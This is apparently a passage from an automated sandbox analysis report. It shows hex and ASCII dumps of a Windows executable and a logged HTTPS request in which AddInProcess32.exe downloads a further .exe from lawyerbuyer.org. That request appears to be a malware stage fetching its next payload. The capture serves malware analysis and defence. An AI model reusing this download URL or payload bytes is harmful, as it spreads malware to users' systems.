                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC691INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a5 10 45 5e e1 71 2b 0d e1 71 2b 0d e1 71 2b 0d 8e 07 80 0d f5 71 2b 0d 8e 07 b5 0d f6 71 2b 0d 8e 07 81 0d b8 71 2b 0d e8 09 b8 0d e2 71 2b 0d e1 71 2a 0d ba 71 2b 0d 8e 07 84 0d e0 71 2b 0d 8e 07 b1 0d e0 71 2b 0d 8e 07 b6 0d e0 71 2b 0d 52 69 63 68 e1 71 2b 0d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 2b 84 4d 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 96 00
                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$E^q+q+q+q+q+q+q+q*q+q+q+q+Richq+PEL+Mc
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC1369INData Raw: 8c 0d a4 ee 80 00 66 8c 1d 80 ee 80 00 66 8c 05 7c ee 80 00 66 8c 25 78 ee 80 00 66 8c 2d 74 ee 80 00 9c 8f 05 a8 ee 80 00 8b 45 00 a3 9c ee 80 00 8b 45 04 a3 a0 ee 80 00 8d 45 08 a3 ac ee 80 00 8b 85 e0 fc ff ff c7 05 e8 ed 80 00 01 00 01 00 a1 a0 ee 80 00 a3 9c ed 80 00 c7 05 90 ed 80 00 09 04 00 c0 c7 05 94 ed 80 00 01 00 00 00 a1 04 d0 80 00 89 85 d8 fc ff ff a1 08 d0 80 00 89 85 dc fc ff ff ff 15 ac b0 40 00 a3 e0 ed 80 00 6a 01 e8 e5 16 00 00 59 6a 00 ff 15 a8 b0 40 00 68 90 b1 40 00 ff 15 6c b0 40 00 83 3d e0 ed 80 00 00 75 08 6a 01 e8 c1 16 00 00 59 68 09 04 00 c0 ff 15 a4 b0 40 00 50 ff 15 a0 b0 40 00 c9 c3 8b ff 55 8b ec 8b 45 08 33 c9 3b 04 cd 10 d0 80 00 74 13 41 83 f9 2d 72 f1 8d 48 ed 83 f9 11 77 0e 6a 0d 58 5d c3 8b 04 cd 14 d0 80 00 5d c3
                                                                                                                                                                                                                                                            Data Ascii: ff|f%xf-tEEE@jYj@h@l@=ujYh@P@UE3;tA-rHwjX]]
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC1369INData Raw: 6a 01 ff 75 08 e8 99 fe ff ff 83 c4 0c 5d c3 6a 01 6a 00 6a 00 e8 89 fe ff ff 83 c4 0c c3 6a 01 6a 01 6a 00 e8 7a fe ff ff 83 c4 0c c3 8b ff 55 8b ec e8 4b 05 00 00 ff 75 08 e8 94 03 00 00 59 68 ff 00 00 00 e8 af ff ff ff cc 68 10 1a 40 00 64 ff 35 00 00 00 00 8b 44 24 10 89 6c 24 10 8d 6c 24 10 2b e0 53 56 57 a1 04 d0 80 00 31 45 fc 33 c5 50 89 65 e8 ff 75 f8 8b 45 fc c7 45 fc fe ff ff ff 89 45 f8 8d 45 f0 64 a3 00 00 00 00 c3 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5f 5e 5b 8b e5 5d 51 c3 cc cc cc cc cc cc cc 8b ff 55 8b ec 83 ec 18 53 8b 5d 0c 56 8b 73 08 33 35 04 d0 80 00 57 8b 06 c6 45 ff 00 c7 45 f4 01 00 00 00 8d 7b 10 83 f8 fe 74 0d 8b 4e 04 03 cf 33 0c 38 e8 b7 f5 ff ff 8b 4e 0c 8b 46 08 03 cf 33 0c 38 e8 a7 f5 ff ff 8b 45 08 f6 40 04 66 0f 85 19 01
                                                                                                                                                                                                                                                            Data Ascii: ju]jjjjjjzUKuYhh@d5D$l$l$+SVW1E3PeuEEEEdMdY__^[]QUS]Vs35WEE{tN38NF38E@f
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC1369INData Raw: ff 50 88 5d fb e8 58 15 00 00 59 50 8d 85 08 fe ff ff 50 56 ff 15 cc b0 40 00 8b 4d fc 5f 5e 33 cd 5b e8 1b f1 ff ff c9 c3 6a 03 e8 e9 18 00 00 59 83 f8 01 74 15 6a 03 e8 dc 18 00 00 59 85 c0 75 1f 83 3d 00 d0 80 00 01 75 16 68 fc 00 00 00 e8 25 fe ff ff 68 ff 00 00 00 e8 1b fe ff ff 59 59 c3 8b ff 55 8b ec 56 e8 85 08 00 00 8b f0 85 f6 0f 84 32 01 00 00 8b 4e 5c 8b 55 08 8b c1 57 39 10 74 0d 83 c0 0c 8d b9 90 00 00 00 3b c7 72 ef 81 c1 90 00 00 00 3b c1 73 04 39 10 74 02 33 c0 85 c0 74 07 8b 50 08 85 d2 75 07 33 c0 e9 f5 00 00 00 83 fa 05 75 0c 83 60 08 00 33 c0 40 e9 e4 00 00 00 83 fa 01 0f 84 d8 00 00 00 8b 4d 0c 53 8b 5e 60 89 4e 60 8b 48 04 83 f9 08 0f 85 b6 00 00 00 6a 24 59 8b 7e 5c 83 64 39 08 00 83 c1 0c 81 f9 90 00 00 00 7c ed 8b 00 8b 7e 64 3d
                                                                                                                                                                                                                                                            Data Ascii: P]XYPPV@M_^3[jYtjYu=uh%hYYUV2N\UW9t;r;s9t3tPu3u`3@MS^`N`Hj$Y~\d9|~d=
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC1369INData Raw: 90 00 08 00 00 a3 00 55 85 00 89 35 f8 54 85 00 3b c2 73 36 83 c0 05 83 48 fb ff 66 c7 40 ff 00 0a 89 48 03 66 c7 40 1f 00 0a c6 40 21 0a 89 48 33 88 48 2f 8b 35 00 55 85 00 83 c0 40 8d 50 fb 81 c6 00 08 00 00 3b d6 72 cd 53 57 66 39 4d e6 0f 84 0e 01 00 00 8b 45 e8 3b c1 0f 84 03 01 00 00 8b 18 83 c0 04 89 45 fc 03 c3 be 00 08 00 00 89 45 f8 3b de 7c 02 8b de 39 1d f8 54 85 00 7d 6b bf 04 55 85 00 6a 40 6a 20 e8 52 f1 ff ff 59 59 85 c0 74 51 83 05 f8 54 85 00 20 8d 88 00 08 00 00 89 07 3b c1 73 31 83 c0 05 83 48 fb ff 83 60 03 00 80 60 1f 80 83 60 33 00 66 c7 40 ff 00 0a 66 c7 40 20 0a 0a c6 40 2f 00 8b 0f 83 c0 40 03 ce 8d 50 fb 3b d1 72 d2 83 c7 04 39 1d f8 54 85 00 7c a2 eb 06 8b 1d f8 54 85 00 33 ff 85 db 7e 72 8b 45 f8 8b 00 83 f8 ff 74 5c 83 f8 fe
                                                                                                                                                                                                                                                            Data Ascii: U5T;s6Hf@Hf@@!H3H/5U@P;rSWf9ME;EE;|9T}kUj@j RYYtQT ;s1H```3f@f@ @/@P;r9T|T3~rEt\
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC1369INData Raw: 59 c3 8b ff 57 68 54 bc 40 00 ff 15 bc b0 40 00 8b f8 85 ff 75 09 e8 34 fd ff ff 33 c0 5f c3 56 8b 35 b8 b0 40 00 68 90 bc 40 00 57 ff d6 68 84 bc 40 00 57 a3 2c f9 80 00 ff d6 68 78 bc 40 00 57 a3 30 f9 80 00 ff d6 68 70 bc 40 00 57 a3 34 f9 80 00 ff d6 83 3d 2c f9 80 00 00 8b 35 f0 b0 40 00 a3 38 f9 80 00 74 16 83 3d 30 f9 80 00 00 74 0d 83 3d 34 f9 80 00 00 74 04 85 c0 75 24 a1 ec b0 40 00 a3 30 f9 80 00 a1 f4 b0 40 00 c7 05 2c f9 80 00 82 26 40 00 89 35 34 f9 80 00 a3 38 f9 80 00 ff 15 e8 b0 40 00 a3 c4 d1 80 00 83 f8 ff 0f 84 c1 00 00 00 ff 35 30 f9 80 00 50 ff d6 85 c0 0f 84 b0 00 00 00 e8 dd ec ff ff ff 35 2c f9 80 00 8b 35 88 b0 40 00 ff d6 ff 35 30 f9 80 00 a3 2c f9 80 00 ff d6 ff 35 34 f9 80 00 a3 30 f9 80 00 ff d6 ff 35 38 f9 80 00 a3 34 f9 80
                                                                                                                                                                                                                                                            Data Ascii: YWhT@@u43_V5@h@Wh@W,hx@W0hp@W4=,5@8t=0t=4tu$@0@,&@548@50P5,5@50,540584
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC1369INData Raw: ff ff 59 ff 36 ff 15 1c b1 40 00 5e 5d c3 6a 08 68 50 bf 80 00 e8 cd ea ff ff e8 41 f9 ff ff 8b 40 78 85 c0 74 16 83 65 fc 00 ff d0 eb 07 33 c0 40 c3 8b 65 e8 c7 45 fc fe ff ff ff e8 a0 17 00 00 e8 e6 ea ff ff c3 68 d7 2e 40 00 ff 15 88 b0 40 00 a3 90 fa 80 00 c3 8b ff 55 8b ec 8b 45 08 a3 94 fa 80 00 a3 98 fa 80 00 a3 9c fa 80 00 a3 a0 fa 80 00 5d c3 8b ff 55 8b ec 8b 45 08 8b 0d 4c bc 40 00 56 39 50 04 74 0f 8b f1 6b f6 0c 03 75 08 83 c0 0c 3b c6 72 ec 6b c9 0c 03 4d 08 5e 3b c1 73 05 39 50 04 74 02 33 c0 5d c3 ff 35 9c fa 80 00 ff 15 8c b0 40 00 c3 6a 20 68 70 bf 80 00 e8 21 ea ff ff 33 ff 89 7d e4 89 7d d8 8b 5d 08 83 fb 0b 7f 4b 74 15 8b c3 6a 02 59 2b c1 74 22 2b c1 74 08 2b c1 74 59 2b c1 75 43 e8 f5 f7 ff ff 8b f8 89 7d d8 85 ff 75 14 83 c8 ff e9
                                                                                                                                                                                                                                                            Data Ascii: Y6@^]jhPA@xte3@eEh.@@UE]UEL@V9Ptku;rkM^;s9Pt3]5@j hp!3}}]KtjY+t"+t+tY+uC}u
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC1369INData Raw: 24 04 f7 c1 03 00 00 00 74 24 8a 01 83 c1 01 84 c0 74 4e f7 c1 03 00 00 00 75 ef 05 00 00 00 00 8d a4 24 00 00 00 00 8d a4 24 00 00 00 00 8b 01 ba ff fe fe 7e 03 d0 83 f0 ff 33 c2 83 c1 04 a9 00 01 01 81 74 e8 8b 41 fc 84 c0 74 32 84 e4 74 24 a9 00 00 ff 00 74 13 a9 00 00 00 ff 74 02 eb cd 8d 41 ff 8b 4c 24 04 2b c1 c3 8d 41 fe 8b 4c 24 04 2b c1 c3 8d 41 fd 8b 4c 24 04 2b c1 c3 8d 41 fc 8b 4c 24 04 2b c1 c3 8b ff 55 8b ec 83 ec 24 a1 04 d0 80 00 33 c5 89 45 fc 8b 45 08 53 89 45 e0 8b 45 0c 56 57 89 45 e4 e8 a8 f1 ff ff 83 65 ec 00 83 3d b0 fa 80 00 00 89 45 e8 75 7d 68 00 bd 40 00 ff 15 20 b0 40 00 8b d8 85 db 0f 84 10 01 00 00 8b 3d b8 b0 40 00 68 f4 bc 40 00 53 ff d7 85 c0 0f 84 fa 00 00 00 8b 35 88 b0 40 00 50 ff d6 68 e4 bc 40 00 53 a3 b0 fa 80 00 ff
                                                                                                                                                                                                                                                            Data Ascii: $t$tNu$$~3tAt2t$ttAL$+AL$+AL$+AL$+U$3EESEEVWEe=Eu}h@ @=@h@S5@Ph@S
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC1369INData Raw: fc 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 95 90 39 40 00 8b ff a0 39 40 00 a8 39 40 00 b4 39 40 00 c8 39 40 00 8b 45 08 5e 5f c9 c3 90 8a 06 88 07 8b 45 08 5e 5f c9 c3 90 8a 06 88 07 8a 46 01 88 47 01 8b 45 08 5e 5f c9 c3 8d 49 00 8a 06 88 07 8a 46 01 88 47 01 8a 46 02 88 47 02 8b 45 08 5e 5f c9 c3 90 8d 74 31 fc 8d 7c 39 fc f7 c7 03 00 00 00 75 24 c1 e9 02 83 e2 03 83 f9 08 72 0d fd f3 a5 fc ff 24 95 2c 3b 40 00 8b ff f7 d9 ff 24 8d dc 3a 40 00 8d 49 00 8b c7 ba 03 00 00 00 83 f9 04 72 0c 83 e0 03 2b c8 ff 24 85 30 3a 40 00 ff 24 8d 2c 3b 40 00 90 40 3a 40 00 64 3a 40 00 8c 3a 40 00 8a 46 03 23 d1 88 47 03 83 ee 01 c1 e9 02 83 ef 01 83 f9 08 72 b2 fd f3 a5 fc ff 24 95 2c 3b 40 00 8d 49 00 8a 46 03 23 d1 88 47 03 8a 46 02 c1 e9 02 88 47 02 83 ee 02 83 ef
                                                                                                                                                                                                                                                            Data Ascii: $9@9@9@9@9@E^_E^_FGE^_IFGFGE^_t1|9u$r$,;@$:@Ir+$0:@$,;@@:@d:@:@F#Gr$,;@IF#GFG


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            59192.168.2.555638104.21.63.7144344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC110OUTGET /26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: lawyerbuyer.org
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC682INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:01 GMT
                                                                                                                                                                                                                                                            Content-Type: application/x-ms-dos-executable
                                                                                                                                                                                                                                                            Content-Length: 4283792
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Last-Modified: Sun, 10 Mar 2024 22:53:03 GMT
                                                                                                                                                                                                                                                            Cache-Control: max-age=14400
                                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                                            Age: 5
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3rIiduZgkTzydJdbT25yzP9Na1J1%2FS3PDkQJjM1dny1J9fIwGRIugA91zx97yn00CcGAGuGfWKBn2E%2FdqOLhd2LaCt571%2BRedAvIffotBfHN1shOWbpM6%2Bf1BxTKpIEOhUA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8628203aeccb09f1-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC687INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a5 10 45 5e e1 71 2b 0d e1 71 2b 0d e1 71 2b 0d 8e 07 80 0d f5 71 2b 0d 8e 07 b5 0d f6 71 2b 0d 8e 07 81 0d b8 71 2b 0d e8 09 b8 0d e2 71 2b 0d e1 71 2a 0d ba 71 2b 0d 8e 07 84 0d e0 71 2b 0d 8e 07 b1 0d e0 71 2b 0d 8e 07 b6 0d e0 71 2b 0d 52 69 63 68 e1 71 2b 0d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 2b 84 4d 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 96 00
                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$E^q+q+q+q+q+q+q+q*q+q+q+q+Richq+PEL+Mc
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC1369INData Raw: ee 80 00 66 8c 0d a4 ee 80 00 66 8c 1d 80 ee 80 00 66 8c 05 7c ee 80 00 66 8c 25 78 ee 80 00 66 8c 2d 74 ee 80 00 9c 8f 05 a8 ee 80 00 8b 45 00 a3 9c ee 80 00 8b 45 04 a3 a0 ee 80 00 8d 45 08 a3 ac ee 80 00 8b 85 e0 fc ff ff c7 05 e8 ed 80 00 01 00 01 00 a1 a0 ee 80 00 a3 9c ed 80 00 c7 05 90 ed 80 00 09 04 00 c0 c7 05 94 ed 80 00 01 00 00 00 a1 04 d0 80 00 89 85 d8 fc ff ff a1 08 d0 80 00 89 85 dc fc ff ff ff 15 ac b0 40 00 a3 e0 ed 80 00 6a 01 e8 e5 16 00 00 59 6a 00 ff 15 a8 b0 40 00 68 90 b1 40 00 ff 15 6c b0 40 00 83 3d e0 ed 80 00 00 75 08 6a 01 e8 c1 16 00 00 59 68 09 04 00 c0 ff 15 a4 b0 40 00 50 ff 15 a0 b0 40 00 c9 c3 8b ff 55 8b ec 8b 45 08 33 c9 3b 04 cd 10 d0 80 00 74 13 41 83 f9 2d 72 f1 8d 48 ed 83 f9 11 77 0e 6a 0d 58 5d c3 8b 04 cd 14 d0
                                                                                                                                                                                                                                                            Data Ascii: fff|f%xf-tEEE@jYj@h@l@=ujYh@P@UE3;tA-rHwjX]
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC1369INData Raw: 8b ec 6a 00 6a 01 ff 75 08 e8 99 fe ff ff 83 c4 0c 5d c3 6a 01 6a 00 6a 00 e8 89 fe ff ff 83 c4 0c c3 6a 01 6a 01 6a 00 e8 7a fe ff ff 83 c4 0c c3 8b ff 55 8b ec e8 4b 05 00 00 ff 75 08 e8 94 03 00 00 59 68 ff 00 00 00 e8 af ff ff ff cc 68 10 1a 40 00 64 ff 35 00 00 00 00 8b 44 24 10 89 6c 24 10 8d 6c 24 10 2b e0 53 56 57 a1 04 d0 80 00 31 45 fc 33 c5 50 89 65 e8 ff 75 f8 8b 45 fc c7 45 fc fe ff ff ff 89 45 f8 8d 45 f0 64 a3 00 00 00 00 c3 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5f 5e 5b 8b e5 5d 51 c3 cc cc cc cc cc cc cc 8b ff 55 8b ec 83 ec 18 53 8b 5d 0c 56 8b 73 08 33 35 04 d0 80 00 57 8b 06 c6 45 ff 00 c7 45 f4 01 00 00 00 8d 7b 10 83 f8 fe 74 0d 8b 4e 04 03 cf 33 0c 38 e8 b7 f5 ff ff 8b 4e 0c 8b 46 08 03 cf 33 0c 38 e8 a7 f5 ff ff 8b 45 08 f6 40 04 66
                                                                                                                                                                                                                                                            Data Ascii: jju]jjjjjjzUKuYhh@d5D$l$l$+SVW1E3PeuEEEEdMdY__^[]QUS]Vs35WEE{tN38NF38E@f
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC1369INData Raw: 85 08 fe ff ff 50 88 5d fb e8 58 15 00 00 59 50 8d 85 08 fe ff ff 50 56 ff 15 cc b0 40 00 8b 4d fc 5f 5e 33 cd 5b e8 1b f1 ff ff c9 c3 6a 03 e8 e9 18 00 00 59 83 f8 01 74 15 6a 03 e8 dc 18 00 00 59 85 c0 75 1f 83 3d 00 d0 80 00 01 75 16 68 fc 00 00 00 e8 25 fe ff ff 68 ff 00 00 00 e8 1b fe ff ff 59 59 c3 8b ff 55 8b ec 56 e8 85 08 00 00 8b f0 85 f6 0f 84 32 01 00 00 8b 4e 5c 8b 55 08 8b c1 57 39 10 74 0d 83 c0 0c 8d b9 90 00 00 00 3b c7 72 ef 81 c1 90 00 00 00 3b c1 73 04 39 10 74 02 33 c0 85 c0 74 07 8b 50 08 85 d2 75 07 33 c0 e9 f5 00 00 00 83 fa 05 75 0c 83 60 08 00 33 c0 40 e9 e4 00 00 00 83 fa 01 0f 84 d8 00 00 00 8b 4d 0c 53 8b 5e 60 89 4e 60 8b 48 04 83 f9 08 0f 85 b6 00 00 00 6a 24 59 8b 7e 5c 83 64 39 08 00 83 c1 0c 81 f9 90 00 00 00 7c ed 8b 00
                                                                                                                                                                                                                                                            Data Ascii: P]XYPPV@M_^3[jYtjYu=uh%hYYUV2N\UW9t;r;s9t3tPu3u`3@MS^`N`Hj$Y~\d9|
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC1369INData Raw: 02 00 00 8d 90 00 08 00 00 a3 00 55 85 00 89 35 f8 54 85 00 3b c2 73 36 83 c0 05 83 48 fb ff 66 c7 40 ff 00 0a 89 48 03 66 c7 40 1f 00 0a c6 40 21 0a 89 48 33 88 48 2f 8b 35 00 55 85 00 83 c0 40 8d 50 fb 81 c6 00 08 00 00 3b d6 72 cd 53 57 66 39 4d e6 0f 84 0e 01 00 00 8b 45 e8 3b c1 0f 84 03 01 00 00 8b 18 83 c0 04 89 45 fc 03 c3 be 00 08 00 00 89 45 f8 3b de 7c 02 8b de 39 1d f8 54 85 00 7d 6b bf 04 55 85 00 6a 40 6a 20 e8 52 f1 ff ff 59 59 85 c0 74 51 83 05 f8 54 85 00 20 8d 88 00 08 00 00 89 07 3b c1 73 31 83 c0 05 83 48 fb ff 83 60 03 00 80 60 1f 80 83 60 33 00 66 c7 40 ff 00 0a 66 c7 40 20 0a 0a c6 40 2f 00 8b 0f 83 c0 40 03 ce 8d 50 fb 3b d1 72 d2 83 c7 04 39 1d f8 54 85 00 7c a2 eb 06 8b 1d f8 54 85 00 33 ff 85 db 7e 72 8b 45 f8 8b 00 83 f8 ff 74
                                                                                                                                                                                                                                                            Data Ascii: U5T;s6Hf@Hf@@!H3H/5U@P;rSWf9ME;EE;|9T}kUj@j RYYtQT ;s1H```3f@f@ @/@P;r9T|T3~rEt
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC1369INData Raw: 5b 04 00 00 59 c3 8b ff 57 68 54 bc 40 00 ff 15 bc b0 40 00 8b f8 85 ff 75 09 e8 34 fd ff ff 33 c0 5f c3 56 8b 35 b8 b0 40 00 68 90 bc 40 00 57 ff d6 68 84 bc 40 00 57 a3 2c f9 80 00 ff d6 68 78 bc 40 00 57 a3 30 f9 80 00 ff d6 68 70 bc 40 00 57 a3 34 f9 80 00 ff d6 83 3d 2c f9 80 00 00 8b 35 f0 b0 40 00 a3 38 f9 80 00 74 16 83 3d 30 f9 80 00 00 74 0d 83 3d 34 f9 80 00 00 74 04 85 c0 75 24 a1 ec b0 40 00 a3 30 f9 80 00 a1 f4 b0 40 00 c7 05 2c f9 80 00 82 26 40 00 89 35 34 f9 80 00 a3 38 f9 80 00 ff 15 e8 b0 40 00 a3 c4 d1 80 00 83 f8 ff 0f 84 c1 00 00 00 ff 35 30 f9 80 00 50 ff d6 85 c0 0f 84 b0 00 00 00 e8 dd ec ff ff ff 35 2c f9 80 00 8b 35 88 b0 40 00 ff d6 ff 35 30 f9 80 00 a3 2c f9 80 00 ff d6 ff 35 34 f9 80 00 a3 30 f9 80 00 ff d6 ff 35 38 f9 80 00
                                                                                                                                                                                                                                                            Data Ascii: [YWhT@@u43_V5@h@Wh@W,hx@W0hp@W4=,5@8t=0t=4tu$@0@,&@548@50P5,5@50,54058
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC1369INData Raw: 11 e8 c7 ea ff ff 59 ff 36 ff 15 1c b1 40 00 5e 5d c3 6a 08 68 50 bf 80 00 e8 cd ea ff ff e8 41 f9 ff ff 8b 40 78 85 c0 74 16 83 65 fc 00 ff d0 eb 07 33 c0 40 c3 8b 65 e8 c7 45 fc fe ff ff ff e8 a0 17 00 00 e8 e6 ea ff ff c3 68 d7 2e 40 00 ff 15 88 b0 40 00 a3 90 fa 80 00 c3 8b ff 55 8b ec 8b 45 08 a3 94 fa 80 00 a3 98 fa 80 00 a3 9c fa 80 00 a3 a0 fa 80 00 5d c3 8b ff 55 8b ec 8b 45 08 8b 0d 4c bc 40 00 56 39 50 04 74 0f 8b f1 6b f6 0c 03 75 08 83 c0 0c 3b c6 72 ec 6b c9 0c 03 4d 08 5e 3b c1 73 05 39 50 04 74 02 33 c0 5d c3 ff 35 9c fa 80 00 ff 15 8c b0 40 00 c3 6a 20 68 70 bf 80 00 e8 21 ea ff ff 33 ff 89 7d e4 89 7d d8 8b 5d 08 83 fb 0b 7f 4b 74 15 8b c3 6a 02 59 2b c1 74 22 2b c1 74 08 2b c1 74 59 2b c1 75 43 e8 f5 f7 ff ff 8b f8 89 7d d8 85 ff 75 14
                                                                                                                                                                                                                                                            Data Ascii: Y6@^]jhPA@xte3@eEh.@@UE]UEL@V9Ptku;rkM^;s9Pt3]5@j hp!3}}]KtjY+t"+t+tY+uC}u
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC1369INData Raw: cc cc 8b 4c 24 04 f7 c1 03 00 00 00 74 24 8a 01 83 c1 01 84 c0 74 4e f7 c1 03 00 00 00 75 ef 05 00 00 00 00 8d a4 24 00 00 00 00 8d a4 24 00 00 00 00 8b 01 ba ff fe fe 7e 03 d0 83 f0 ff 33 c2 83 c1 04 a9 00 01 01 81 74 e8 8b 41 fc 84 c0 74 32 84 e4 74 24 a9 00 00 ff 00 74 13 a9 00 00 00 ff 74 02 eb cd 8d 41 ff 8b 4c 24 04 2b c1 c3 8d 41 fe 8b 4c 24 04 2b c1 c3 8d 41 fd 8b 4c 24 04 2b c1 c3 8d 41 fc 8b 4c 24 04 2b c1 c3 8b ff 55 8b ec 83 ec 24 a1 04 d0 80 00 33 c5 89 45 fc 8b 45 08 53 89 45 e0 8b 45 0c 56 57 89 45 e4 e8 a8 f1 ff ff 83 65 ec 00 83 3d b0 fa 80 00 00 89 45 e8 75 7d 68 00 bd 40 00 ff 15 20 b0 40 00 8b d8 85 db 0f 84 10 01 00 00 8b 3d b8 b0 40 00 68 f4 bc 40 00 53 ff d7 85 c0 0f 84 fa 00 00 00 8b 35 88 b0 40 00 50 ff d6 68 e4 bc 40 00 53 a3 b0
                                                                                                                                                                                                                                                            Data Ascii: L$t$tNu$$~3tAt2t$ttAL$+AL$+AL$+AL$+U$3EESEEVWEe=Eu}h@ @=@h@S5@Ph@S
